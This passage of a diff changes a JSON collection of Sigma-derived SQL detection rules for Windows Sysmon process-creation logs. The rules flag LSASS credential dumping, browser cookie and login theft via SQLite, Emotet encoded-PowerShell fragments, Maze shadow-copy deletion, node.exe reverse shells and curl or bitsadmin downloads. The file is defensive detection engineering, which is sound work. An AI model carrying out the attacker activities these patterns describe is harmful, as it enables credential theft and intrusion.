'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", - "status": "test", - "description": "Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "status": "experimental", + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216.001" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "status": "test", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055.001" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", - "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", - "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "PUA - NirCmd Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", @@ -16838,596 +16747,580 @@ "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "status": "experimental", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE 